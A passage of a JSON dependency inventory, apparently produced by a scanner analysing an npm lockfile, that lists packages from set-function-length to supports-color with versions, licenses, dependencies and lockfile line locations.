"2.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 19393, "EndLine": 19398 } ], "AnalyzedBy": "npm" }, { "ID": "set-function-length@1.2.2", "Name": "set-function-length", "Identifier": { "PURL": "pkg:npm/set-function-length@1.2.2", "UID": "620438fd673cb85e" }, "Version": "1.2.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "define-data-property@1.1.4", "es-errors@1.3.0", "function-bind@1.1.2", "get-intrinsic@1.3.0", "gopd@1.2.0", "has-property-descriptors@1.0.2" ], "Locations": [ { "StartLine": 19399, "EndLine": 19415 } ], "AnalyzedBy": "npm" }, { "ID": "setimmediate@1.0.5", "Name": "setimmediate", "Identifier": { "PURL": "pkg:npm/setimmediate@1.0.5", "UID": "7bfaf99125bcf316" }, "Version": "1.0.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 19447, "EndLine": 19452 } ], "AnalyzedBy": "npm" }, { "ID": "setprototypeof@1.2.0", "Name": "setprototypeof", "Identifier": { "PURL": "pkg:npm/setprototypeof@1.2.0", "UID": "5f985c5811f4e42a" }, "Version": "1.2.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 19453, "EndLine": 19458 } ], "AnalyzedBy": "npm" }, { "ID": "sha1-file@1.0.4", "Name": "sha1-file", "Identifier": { "PURL": "pkg:npm/sha1-file@1.0.4", "UID": "dd317e0ae1d448b0" }, "Version": "1.0.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 19459, "EndLine": 19465 } ], "AnalyzedBy": "npm" }, { "ID": "sharp@0.32.6", "Name": "sharp", "Identifier": { "PURL": "pkg:npm/sharp@0.32.6", "UID": "4172236144483a3" }, "Version": "0.32.6", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "color@4.2.3", "detect-libc@2.1.2", "node-addon-api@6.1.0", "prebuild-install@7.1.3", "semver@7.7.3", "simple-get@4.0.1", "tar-fs@3.1.1", "tunnel-agent@0.6.0" ], "Locations": [ { "StartLine": 19466, "EndLine": 19488 } ], "AnalyzedBy": "npm" }, { "ID": "shebang-command@2.0.0", "Name": "shebang-command", "Identifier": { "PURL": "pkg:npm/shebang-command@2.0.0", "UID": "23d5297f88a3dd86" }, "Version": "2.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "shebang-regex@3.0.0" ], "Locations": [ { "StartLine": 15462, "EndLine": 15474 }, { "StartLine": 19501, "EndLine": 19512 } ], "AnalyzedBy": "npm" }, { "ID": "shebang-regex@3.0.0", "Name": "shebang-regex", "Identifier": { "PURL": "pkg:npm/shebang-regex@3.0.0", "UID": "791554a4e712ef27" }, "Version": "3.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 15475, "EndLine": 15484 }, { "StartLine": 19513, "EndLine": 19521 } ], "AnalyzedBy": "npm" }, { "ID": "shell-quote@1.8.3", "Name": "shell-quote", "Identifier": { "PURL": "pkg:npm/shell-quote@1.8.3", "UID": "84ebbd8a7228facc" }, "Version": "1.8.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 19522, "EndLine": 19533 } ], "AnalyzedBy": "npm" }, { "ID": "side-channel@1.1.0", "Name": "side-channel", "Identifier": { "PURL": "pkg:npm/side-channel@1.1.0", "UID": "ade966b75fcdf977" }, "Version": "1.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "es-errors@1.3.0", "object-inspect@1.13.4", "side-channel-list@1.0.0", "side-channel-map@1.0.1", "side-channel-weakmap@1.0.2" ], "Locations": [ { "StartLine": 19534, "EndLine": 19553 } ], "AnalyzedBy": "npm" }, { "ID": "side-channel-list@1.0.0", "Name": "side-channel-list", "Identifier": { "PURL": "pkg:npm/side-channel-list@1.0.0", "UID": "908f75051506867c" }, "Version": "1.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "es-errors@1.3.0", "object-inspect@1.13.4" ], "Locations": [ { "StartLine": 19554, "EndLine": 19570 } ], "AnalyzedBy": "npm" }, { "ID": "side-channel-map@1.0.1", "Name": "side-channel-map", "Identifier": { "PURL": "pkg:npm/side-channel-map@1.0.1", "UID": "39b4966b9b1b8dcc" }, "Version": "1.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "call-bound@1.0.4", "es-errors@1.3.0", "get-intrinsic@1.3.0", "object-inspect@1.13.4" ], "Locations": [ { "StartLine": 19571, "EndLine": 19589 } ], "AnalyzedBy": "npm" }, { "ID": "side-channel-weakmap@1.0.2", "Name": "side-channel-weakmap", "Identifier": { "PURL": "pkg:npm/side-channel-weakmap@1.0.2", "UID": "6b57608feb3c2cac" }, "Version": "1.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "call-bound@1.0.4", "es-errors@1.3.0", "get-intrinsic@1.3.0", "object-inspect@1.13.4", "side-channel-map@1.0.1" ], "Locations": [ { "StartLine": 19590, "EndLine": 19609 } ], "AnalyzedBy": "npm" }, { "ID": "signal-exit@3.0.7", "Name": "signal-exit", "Identifier": { "PURL": "pkg:npm/signal-exit@3.0.7", "UID": "f76d68f9b572d6bc" }, "Version": "3.0.7", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 19610, "EndLine": 19615 } ], "AnalyzedBy": "npm" }, { "ID": "signal-exit@4.1.0", "Name": "signal-exit", "Identifier": { "PURL": "pkg:npm/signal-exit@4.1.0", "UID": "16b1ae66e5c43e9e" }, "Version": "4.1.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9444, "EndLine": 9455 }, { "StartLine": 15485, "EndLine": 15497 } ], "AnalyzedBy": "npm" }, { "ID": "sigstore@4.0.0", "Name": "sigstore", "Identifier": { "PURL": "pkg:npm/sigstore@4.0.0", "UID": "e449f3fa728ea2c1" }, "Version": "4.0.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@sigstore/bundle@4.0.0", "@sigstore/core@3.0.0", "@sigstore/protobuf-specs@0.5.0", "@sigstore/sign@4.0.1", "@sigstore/tuf@4.0.0", "@sigstore/verify@3.0.0" ], "Locations": [ { "StartLine": 15498, "EndLine": 15513 } ], "AnalyzedBy": "npm" }, { "ID": "simple-concat@1.0.1", "Name": "simple-concat", "Identifier": { "PURL": "pkg:npm/simple-concat@1.0.1", "UID": "bfcdc21c02f2e0f6" }, "Version": "1.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 19616, "EndLine": 19635 } ], "AnalyzedBy": "npm" }, { "ID": "simple-get@4.0.1", "Name": "simple-get", "Identifier": { "PURL": "pkg:npm/simple-get@4.0.1", "UID": "be2782fb9477fd2c" }, "Version": "4.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "decompress-response@6.0.0", "once@1.4.0", "simple-concat@1.0.1" ], "Locations": [ { "StartLine": 19636, "EndLine": 19660 } ], "AnalyzedBy": "npm" }, { "ID": "simple-plist@1.3.1", "Name": "simple-plist", "Identifier": { "PURL": "pkg:npm/simple-plist@1.3.1", "UID": "f6fb13458162c500" }, "Version": "1.3.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "bplist-creator@0.1.0", "bplist-parser@0.3.1", "plist@3.1.0" ], "Locations": [ { "StartLine": 19661, "EndLine": 19671 } ], "AnalyzedBy": "npm" }, { "ID": "simple-swizzle@0.2.4", "Name": "simple-swizzle", "Identifier": { "PURL": "pkg:npm/simple-swizzle@0.2.4", "UID": "3fbf09706379576e" }, "Version": "0.2.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "is-arrayish@0.3.4" ], "Locations": [ { "StartLine": 19672, "EndLine": 19680 } ], "AnalyzedBy": "npm" }, { "ID": "sisteransi@1.0.5", "Name": "sisteransi", "Identifier": { "PURL": "pkg:npm/sisteransi@1.0.5", "UID": "e2511b6faea46d61" }, "Version": "1.0.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 19687, "EndLine": 19692 } ], "AnalyzedBy": "npm" }, { "ID": "slash@3.0.0", "Name": "slash", "Identifier": { "PURL": "pkg:npm/slash@3.0.0", "UID": "288ef1c26aa031a7" }, "Version": "3.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 19693, "EndLine": 19701 } ], "AnalyzedBy": "npm" }, { "ID": "slice-ansi@2.1.0", "Name": "slice-ansi", "Identifier": { "PURL": "pkg:npm/slice-ansi@2.1.0", "UID": "de93c907c9b7b81e" }, "Version": "2.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "ansi-styles@3.2.1", "astral-regex@1.0.0", "is-fullwidth-code-point@2.0.0" ], "Locations": [ { "StartLine": 19702, "EndLine": 19716 } ], "AnalyzedBy": "npm" }, { "ID": "slugify@1.6.6", "Name": "slugify", "Identifier": { "PURL": "pkg:npm/slugify@1.6.6", "UID": "589f6082ee882935" }, "Version": "1.6.6", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 19747, "EndLine": 19755 } ], "AnalyzedBy": "npm" }, { "ID": "smart-buffer@4.2.0", "Name": "smart-buffer", "Identifier": { "PURL": "pkg:npm/smart-buffer@4.2.0", "UID": "932509962beee2d0" }, "Version": "4.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 15514, "EndLine": 15524 }, { "StartLine": 19756, "EndLine": 19766 } ], "AnalyzedBy": "npm" }, { "ID": "snake-case@3.0.4", "Name": "snake-case", "Identifier": { "PURL": "pkg:npm/snake-case@3.0.4", "UID": "cf7b71fa8562195e" }, "Version": "3.0.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "dot-case@3.0.4", "tslib@2.8.1" ], "Locations": [ { "StartLine": 19767, "EndLine": 19776 } ], "AnalyzedBy": "npm" }, { "ID": "socks@2.8.7", "Name": "socks", "Identifier": { "PURL": "pkg:npm/socks@2.8.7", "UID": "ba3cfd665ff2a760" }, "Version": "2.8.7", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "ip-address@10.0.1", "smart-buffer@4.2.0" ], "Locations": [ { "StartLine": 15525, "EndLine": 15539 }, { "StartLine": 19783, "EndLine": 19797 } ], "AnalyzedBy": "npm" }, { "ID": "socks-proxy-agent@6.2.1", "Name": "socks-proxy-agent", "Identifier": { "PURL": "pkg:npm/socks-proxy-agent@6.2.1", "UID": "1d6eb1d30dd7c41d" }, "Version": "6.2.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "agent-base@6.0.2", "debug@4.4.3", "socks@2.8.7" ], "Locations": [ { "StartLine": 19798, "EndLine": 19812 } ], "AnalyzedBy": "npm" }, { "ID": "socks-proxy-agent@8.0.5", "Name": "socks-proxy-agent", "Identifier": { "PURL": "pkg:npm/socks-proxy-agent@8.0.5", "UID": "9cb617e3df1c64f2" }, "Version": "8.0.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "agent-base@7.1.4", "debug@4.4.3", "socks@2.8.7" ], "Locations": [ { "StartLine": 15540, "EndLine": 15554 } ], "AnalyzedBy": "npm" }, { "ID": "source-map@0.5.6", "Name": "source-map", "Identifier": { "PURL": "pkg:npm/source-map@0.5.6", "UID": "42b784e9d3ee1da2" }, "Version": "0.5.6", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 20013, "EndLine": 20021 } ], "AnalyzedBy": "npm" }, { "ID": "source-map@0.5.7", "Name": "source-map", "Identifier": { "PURL": "pkg:npm/source-map@0.5.7", "UID": "a75f0ff3d6a788ab" }, "Version": "0.5.7", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 12613, "EndLine": 12621 }, { "StartLine": 12642, "EndLine": 12650 }, { "StartLine": 12713, "EndLine": 12721 } ], "AnalyzedBy": "npm" }, { "ID": "source-map@0.6.1", "Name": "source-map", "Identifier": { "PURL": "pkg:npm/source-map@0.6.1", "UID": "a9f804ce58430ce" }, "Version": "0.6.1", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 19826, "EndLine": 19834 } ], "AnalyzedBy": "npm" }, { "ID": "source-map-js@1.2.1", "Name": "source-map-js", "Identifier": { "PURL": "pkg:npm/source-map-js@1.2.1", "UID": "56c034fae49afe66" }, "Version": "1.2.1", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 19835, "EndLine": 19843 } ], "AnalyzedBy": "npm" }, { "ID": "source-map-support@0.5.21", "Name": "source-map-support", "Identifier": { "PURL": "pkg:npm/source-map-support@0.5.21", "UID": "24100f04fc71a8f1" }, "Version": "0.5.21", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "buffer-from@1.1.2", "source-map@0.6.1" ], "Locations": [ { "StartLine": 20545, "EndLine": 20554 } ], "AnalyzedBy": "npm" }, { "ID": "spdx-correct@3.2.0", "Name": "spdx-correct", "Identifier": { "PURL": "pkg:npm/spdx-correct@3.2.0", "UID": "627ba2dae7519e8c" }, "Version": "3.2.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "spdx-expression-parse@3.0.1", "spdx-license-ids@3.0.22" ], "Locations": [ { "StartLine": 15555, "EndLine": 15565 }, { "StartLine": 19855, "EndLine": 19864 } ], "AnalyzedBy": "npm" }, { "ID": "spdx-exceptions@2.5.0", "Name": "spdx-exceptions", "Identifier": { "PURL": "pkg:npm/spdx-exceptions@2.5.0", "UID": "8722b57c1d40e4ba" }, "Version": "2.5.0", "Licenses": [ "CC-BY-3.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 15575, "EndLine": 15581 }, { "StartLine": 19865, "EndLine": 19870 } ], "AnalyzedBy": "npm" }, { "ID": "spdx-expression-parse@3.0.1", "Name": "spdx-expression-parse", "Identifier": { "PURL": "pkg:npm/spdx-expression-parse@3.0.1", "UID": "828a918479c9625a" }, "Version": "3.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "spdx-exceptions@2.5.0", "spdx-license-ids@3.0.22" ], "Locations": [ { "StartLine": 15566, "EndLine": 15574 }, { "StartLine": 15826, "EndLine": 15834 }, { "StartLine": 19871, "EndLine": 19880 } ], "AnalyzedBy": "npm" }, { "ID": "spdx-expression-parse@4.0.0", "Name": "spdx-expression-parse", "Identifier": { "PURL": "pkg:npm/spdx-expression-parse@4.0.0", "UID": "7efaf09360ffaef3" }, "Version": "4.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "spdx-exceptions@2.5.0", "spdx-license-ids@3.0.22" ], "Locations": [ { "StartLine": 15582, "EndLine": 15592 } ], "AnalyzedBy": "npm" }, { "ID": "spdx-license-ids@3.0.22", "Name": "spdx-license-ids", "Identifier": { "PURL": "pkg:npm/spdx-license-ids@3.0.22", "UID": "94fc45d82e776201" }, "Version": "3.0.22", "Licenses": [ "CC0-1.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 15593, "EndLine": 15599 }, { "StartLine": 19881, "EndLine": 19886 } ], "AnalyzedBy": "npm" }, { "ID": "split-on-first@1.1.0", "Name": "split-on-first", "Identifier": { "PURL": "pkg:npm/split-on-first@1.1.0", "UID": "433c63bd9d16c2ba" }, "Version": "1.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 19887, "EndLine": 19895 } ], "AnalyzedBy": "npm" }, { "ID": "sprintf-js@1.0.3", "Name": "sprintf-js", "Identifier": { "PURL": "pkg:npm/sprintf-js@1.0.3", "UID": "56fec2f14df69783" }, "Version": "1.0.3", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 19896, "EndLine": 19901 } ], "AnalyzedBy": "npm" }, { "ID": "sqlite3@5.1.7", "Name": "sqlite3", "Identifier": { "PURL": "pkg:npm/sqlite3@5.1.7", "UID": "be5833085e5db3e5" }, "Version": "5.1.7", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "bindings@1.5.0", "node-addon-api@7.1.1", "node-gyp@8.4.1", "prebuild-install@7.1.3", "tar@6.2.1" ], "Locations": [ { "StartLine": 19902, "EndLine": 19926 } ], "AnalyzedBy": "npm" }, { "ID": "ssri@12.0.0", "Name": "ssri", "Identifier": { "PURL": "pkg:npm/ssri@12.0.0", "UID": "d8e0000e6f54df6d" }, "Version": "12.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "minipass@7.1.2" ], "Locations": [ { "StartLine": 15600, "EndLine": 15610 } ], "AnalyzedBy": "npm" }, { "ID": "ssri@8.0.1", "Name": "ssri", "Identifier": { "PURL": "pkg:npm/ssri@8.0.1", "UID": "e9eb9165d9385785" }, "Version": "8.0.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "minipass@3.3.6" ], "Locations": [ { "StartLine": 19934, "EndLine": 19946 } ], "AnalyzedBy": "npm" }, { "ID": "stack-generator@2.0.10", "Name": "stack-generator", "Identifier": { "PURL": "pkg:npm/stack-generator@2.0.10", "UID": "2eedcd03ba3648d4" }, "Version": "2.0.10", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "stackframe@1.3.4" ], "Locations": [ { "StartLine": 19967, "EndLine": 19975 } ], "AnalyzedBy": "npm" }, { "ID": "stack-utils@2.0.6", "Name": "stack-utils", "Identifier": { "PURL": "pkg:npm/stack-utils@2.0.6", "UID": "e623ac294bd25906" }, "Version": "2.0.6", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "escape-string-regexp@2.0.0" ], "Locations": [ { "StartLine": 19976, "EndLine": 19987 } ], "AnalyzedBy": "npm" }, { "ID": "stackframe@1.3.4", "Name": "stackframe", "Identifier": { "PURL": "pkg:npm/stackframe@1.3.4", "UID": "11debaa164eb78b4" }, "Version": "1.3.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 19997, "EndLine": 20002 } ], "AnalyzedBy": "npm" }, { "ID": "stacktrace-gps@3.1.2", "Name": "stacktrace-gps", "Identifier": { "PURL": "pkg:npm/stacktrace-gps@3.1.2", "UID": "9e2ace3b24df2d7" }, "Version": "3.1.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "source-map@0.5.6", "stackframe@1.3.4" ], "Locations": [ { "StartLine": 20003, "EndLine": 20012 } ], "AnalyzedBy": "npm" }, { "ID": "stacktrace-js@2.0.2", "Name": "stacktrace-js", "Identifier": { "PURL": "pkg:npm/stacktrace-js@2.0.2", "UID": "b8d8959a58ca8fab" }, "Version": "2.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "error-stack-parser@2.1.4", "stack-generator@2.0.10", "stacktrace-gps@3.1.2" ], "Locations": [ { "StartLine": 20022, "EndLine": 20032 } ], "AnalyzedBy": "npm" }, { "ID": "stacktrace-parser@0.1.11", "Name": "stacktrace-parser", "Identifier": { "PURL": "pkg:npm/stacktrace-parser@0.1.11", "UID": "57c77b887a092d6c" }, "Version": "0.1.11", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "type-fest@0.7.1" ], "Locations": [ { "StartLine": 20033, "EndLine": 20044 } ], "AnalyzedBy": "npm" }, { "ID": "statuses@1.5.0", "Name": "statuses", "Identifier": { "PURL": "pkg:npm/statuses@1.5.0", "UID": "2c4a072884a2d00c" }, "Version": "1.5.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 20054, "EndLine": 20062 } ], "AnalyzedBy": "npm" }, { "ID": "statuses@2.0.1", "Name": "statuses", "Identifier": { "PURL": "pkg:npm/statuses@2.0.1", "UID": "8c0d3b3b7b25dd85" }, "Version": "2.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10085, "EndLine": 10093 }, { "StartLine": 19351, "EndLine": 19359 } ], "AnalyzedBy": "npm" }, { "ID": "stream-buffers@2.2.0", "Name": "stream-buffers", "Identifier": { "PURL": "pkg:npm/stream-buffers@2.2.0", "UID": "e6bc8cff46600c5d" }, "Version": "2.2.0", "Licenses": [ "Unlicense" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 20077, "EndLine": 20085 } ], "AnalyzedBy": "npm" }, { "ID": "streamx@2.23.0", "Name": "streamx", "Identifier": { "PURL": "pkg:npm/streamx@2.23.0", "UID": "4bae2a631ae10d44" }, "Version": "2.23.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "events-universal@1.0.1", "fast-fifo@1.3.2", "text-decoder@1.2.3" ], "Locations": [ { "StartLine": 20086, "EndLine": 20096 } ], "AnalyzedBy": "npm" }, { "ID": "strict-uri-encode@2.0.0", "Name": "strict-uri-encode", "Identifier": { "PURL": "pkg:npm/strict-uri-encode@2.0.0", "UID": "2959b56cd55d549f" }, "Version": "2.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 20097, "EndLine": 20105 } ], "AnalyzedBy": "npm" }, { "ID": "string-hash-64@1.0.3", "Name": "string-hash-64", "Identifier": { "PURL": "pkg:npm/string-hash-64@1.0.3", "UID": "38985737f9786942" }, "Version": "1.0.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 20115, "EndLine": 20120 } ], "AnalyzedBy": "npm" }, { "ID": "string-width@1.0.2", "Name": "string-width", "Identifier": { "PURL": "pkg:npm/string-width@1.0.2", "UID": "df692d7a6094502f" }, "Version": "1.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "code-point-at@1.1.0", "is-fullwidth-code-point@1.0.0", "strip-ansi@3.0.1" ], "Locations": [ { "StartLine": 17423, "EndLine": 17436 } ], "AnalyzedBy": "npm" }, { "ID": "string-width@4.2.3", "Name": "string-width", "Identifier": { "PURL": "pkg:npm/string-width@4.2.3", "UID": "7d4c6eef86c37927" }, "Version": "4.2.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "emoji-regex@8.0.0", "is-fullwidth-code-point@3.0.0", "strip-ansi@6.0.1" ], "Locations": [ { "StartLine": 15611, "EndLine": 15625 }, { "StartLine": 15626, "EndLine": 15641 }, { "StartLine": 20142, "EndLine": 20155 }, { "StartLine": 20156, "EndLine": 20170 } ], "AnalyzedBy": "npm" }, { "ID": "string-width@5.1.2", "Name": "string-width", "Identifier": { "PURL": "pkg:npm/string-width@5.1.2", "UID": "6e6714fbc8118895" }, "Version": "5.1.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "eastasianwidth@0.2.0", "emoji-regex@9.2.2", "strip-ansi@7.1.2" ], "Locations": [ { "StartLine": 3358, "EndLine": 3374 }, { "StartLine": 13586, "EndLine": 13601 }, { "StartLine": 15938, "EndLine": 15953 } ], "AnalyzedBy": "npm" }, { "ID": "string_decoder@1.1.1", "Name": "string_decoder", "Identifier": { "PURL": "pkg:npm/string_decoder@1.1.1", "UID": "50c199dc85fa7ec6" }, "Version": "1.1.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "safe-buffer@5.1.2" ], "Locations": [ { "StartLine": 17414, "EndLine": 17422 } ], "AnalyzedBy": "npm" }, { "ID": "string_decoder@1.3.0", "Name": "string_decoder", "Identifier": { "PURL": "pkg:npm/string_decoder@1.3.0", "UID": "d4355443b4991078" }, "Version": "1.3.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "safe-buffer@5.2.1" ], "Locations": [ { "StartLine": 20106, "EndLine": 20114 } ], "AnalyzedBy": "npm" }, { "ID": "strip-ansi@3.0.1", "Name": "strip-ansi", "Identifier": { "PURL": "pkg:npm/strip-ansi@3.0.1", "UID": "de4133134e9f0f3c" }, "Version": "3.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "ansi-regex@2.1.1" ], "Locations": [ { "StartLine": 17437, "EndLine": 17448 } ], "AnalyzedBy": "npm" }, { "ID": "strip-ansi@5.2.0", "Name": "strip-ansi", "Identifier": { "PURL": "pkg:npm/strip-ansi@5.2.0", "UID": "6a82dcc5800f65f5" }, "Version": "5.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "ansi-regex@4.1.1" ], "Locations": [ { "StartLine": 5921, "EndLine": 5933 } ], "AnalyzedBy": "npm" }, { "ID": "strip-ansi@6.0.1", "Name": "strip-ansi", "Identifier": { "PURL": "pkg:npm/strip-ansi@6.0.1", "UID": "310f38c9f4b02ffd" }, "Version": "6.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "ansi-regex@5.0.1" ], "Locations": [ { "StartLine": 15642, "EndLine": 15654 }, { "StartLine": 15655, "EndLine": 15668 }, { "StartLine": 20287, "EndLine": 20298 }, { "StartLine": 20299, "EndLine": 20311 } ], "AnalyzedBy": "npm" }, { "ID": "strip-ansi@7.1.2", "Name": "strip-ansi", "Identifier": { "PURL": "pkg:npm/strip-ansi@7.1.2", "UID": "a94c1b82d6a90970" }, "Version": "7.1.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "ansi-regex@6.2.2" ], "Locations": [ { "StartLine": 3375, "EndLine": 3389 }, { "StartLine": 13602, "EndLine": 13617 }, { "StartLine": 15954, "EndLine": 15969 } ], "AnalyzedBy": "npm" }, { "ID": "strip-final-newline@2.0.0", "Name": "strip-final-newline", "Identifier": { "PURL": "pkg:npm/strip-final-newline@2.0.0", "UID": "bc10c259708fdda8" }, "Version": "2.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 20322, "EndLine": 20330 } ], "AnalyzedBy": "npm" }, { "ID": "strip-indent@3.0.0", "Name": "strip-indent", "Identifier": { "PURL": "pkg:npm/strip-indent@3.0.0", "UID": "101db3550303f306" }, "Version": "3.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "min-indent@1.0.1" ], "Locations": [ { "StartLine": 20331, "EndLine": 20342 } ], "AnalyzedBy": "npm" }, { "ID": "strip-json-comments@2.0.1", "Name": "strip-json-comments", "Identifier": { "PURL": "pkg:npm/strip-json-comments@2.0.1", "UID": "f358e5fef1aba34f" }, "Version": "2.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 17148, "EndLine": 17156 } ], "AnalyzedBy": "npm" }, { "ID": "strnum@1.1.2", "Name": "strnum", "Identifier": { "PURL": "pkg:npm/strnum@1.1.2", "UID": "3fa29378ab21d02a" }, "Version": "1.1.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 20356, "EndLine": 20367 } ], "AnalyzedBy": "npm" }, { "ID": "supports-color@10.2.2", "Name": "supports-color", "Identifier": { "PURL": "pkg:npm/supports-color@10.2.2", "UID": "c1d135571ef9ecd3" }, "Version": "10.2.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 15669, "EndLine": 15681 } ], "AnalyzedBy": "npm" }, { "ID": "supports-color@5.5.0", "Name": "supports-color", "Identifier": { "PURL": "pkg:npm/supports-color@5.5.0", "UID": "6e0e692f264bf27a" }, "Version": "5.5.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "has-flag@3.0.0" ], "Locations": [ { "StartLine": 557, "EndLine": 568 } ], "AnalyzedBy": "npm" }, { "ID": "supports-color@7.2.0", "Name": "supports-color", "Identifier": { "PURL": "pkg:npm/supports-color@7.2.0", "UID": "2c8d65b5b002967f" }, "Version": "7.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "has-flag@4.0.0" ], "Locations": [ { "StartLine": 20368, "EndLine": 20379 } ], "AnalyzedBy": "npm" }, { "ID": "supports-color@8.1.1", "Name": "supports-color", "Identifier": { "PURL": "pkg:npm/supports-color@8.1.1", "UID": "567fb10103d06e3" }, "Version": "8.1.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "has-flag@4.0.0" ], "Locations": [ { "StartLine": 11576, "EndLine": 11590 } ], "AnalyzedBy": "npm" }, { "ID": "supports-preserve-symlinks-flag@1.0.0", "Name": "supports-preserve-symlinks-flag", "Identifier": { "PURL": "pkg:npm/supports-preserve-symlinks-flag@1.0.0", 